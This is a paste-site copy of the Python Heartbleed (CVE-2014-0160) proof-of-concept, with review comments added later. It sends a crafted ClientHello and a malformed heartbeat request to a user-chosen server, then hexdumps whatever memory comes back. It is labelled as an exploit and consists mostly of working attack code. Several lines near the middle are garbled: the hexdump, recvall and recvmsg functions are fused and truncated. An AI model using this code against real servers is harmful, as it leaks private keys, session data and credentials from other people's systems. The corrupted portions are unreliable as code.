
SOURCE EXPLOIT - Heartbleed

Googleinurl May 6th, 2014 908 Never
  1. #!/usr/bin/python
  2.  
  3. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  4. # The author disclaims copyright to this source code.
  5.  
import binascii
import re
import select
import socket
import struct
import sys
import time
from optparse import OptionParser
  13.  
# Command-line definition for the probe: one positional server argument plus
# an optional TCP port. main() consumes this via options.parse_args().
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)',
)
options.add_option(
    '-p', '--port',
    dest='port',
    type='int',
    default=443,
    help='TCP port to test (default: 443)',
)
  16.  
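def h2bin(x):
    """Decode a whitespace-separated hex dump into raw bytes.

    Spaces and newlines are stripped before decoding so the multi-line
    literals used for ``hello`` and ``hb`` can be laid out freely (other
    whitespace, e.g. tabs, is deliberately not stripped - same as before).

    ``binascii.unhexlify`` replaces ``str.decode('hex')``: the latter exists
    only on Python 2, whereas unhexlify works on both (returning ``str`` on
    Python 2 and ``bytes`` on Python 3).

    Raises ``binascii.Error`` (a ``ValueError`` subclass on Python 3) for an
    odd-length or non-hex input; the previous implementation raised
    ``TypeError`` in those cases.
    """
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))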
  19.  
# Raw record sent as the client's opening handshake message: main() prints
# 'Sending Client Hello...' immediately before writing this to the socket,
# then reads records until one of type 22 whose first payload byte is 0x0E.
# The bytes are kept as a hex dump; h2bin() strips the spaces and newlines.
# NOTE(review): the layout is never decoded in this file - the leading
# 16 03 02 is presumably the record type/version header; confirm against
# the TLS record format before depending on it.
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                
''')
  37.  
# Heartbeat request record. hit_hb() writes it and then waits for a type-24
# record; a reply payload longer than 3 bytes is what the script reports as
# the vulnerable (CVE-2014-0160) case.
# NOTE(review): main() also sends hb once right before calling hit_hb(), so
# two requests are written per run.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
  42.  
  43. def hexdump(s):
  44.     for b in xrange(0, len(s), 16):
  45.         lin = [c for c in s[b : b + 16]]
  46.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  47.         pdat = ''.join((c if 32 <= ord(c)  0:
  48.         rtime = endtime - time.time()
  49.         if rtime BHH', hdr)
  50.    pay = recvall(s, ln, 10)
  51.    if pay is None:
  52.        print 'Unexpected EOF receiving record payload - server closed connection'
  53.        return None, None, None
  54.    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  55.    return typ, ver, pay
  56.  
def hit_hb(s):
    """Send one heartbeat request on *s* and classify the server's reply.

    Reads records with recvmsg() until one of three outcomes:
      * no record (typ is None, i.e. recvmsg() hit EOF) -> prints the
        "likely not vulnerable" hint and returns False
      * heartbeat record (typ == 24) -> hexdumps it; more than 3 payload
        bytes is reported as the vulnerable case; returns True either way
      * alert record (typ == 21) -> hexdumps it and returns False
    Records of any other type are only logged by recvmsg() and skipped.

    NOTE(review): main() has already sent hb once before calling this, so
    the server sees two heartbeat requests. The loop has no iteration bound
    of its own; it relies on whatever timeout recvmsg()/recvall() apply.
    """
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)  # ver is unpacked but never used here
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            # A reply longer than the expected 3 bytes is what the script
            # treats as the CVE-2014-0160 over-read.
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False
  79.  
def main():
    """Connect to args[0]:opts.port, complete the ClientHello exchange, then probe the heartbeat.

    Prints usage and returns when no server argument is given. Progress is
    written to stdout and flushed after each step so it stays visible while
    the script blocks on the network.

    NOTE(review): no timeout is set on the socket (no s.settimeout()), so
    connect() and the initial reads can block indefinitely against a host
    that accepts TCP but never answers; record reads appear to rely on the
    timeout argument passed to recvall() inside recvmsg() (the literal 10
    visible there) - confirm. The socket is also never closed. Both matter
    once this script is automated.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:  # NOTE(review): `is None` is the idiomatic test; same result here
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        # NOTE(review): pay[0] raises IndexError on a zero-length type-22
        # record; a `pay and` guard would make the loop skip it instead.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    # hit_hb() sends hb again itself, so two heartbeat requests go out.
    hit_hb(s)
  111.  
  112. # 392164AAAD9A3A12   1337day.com [2014-04-09]   F6385B09958196DD #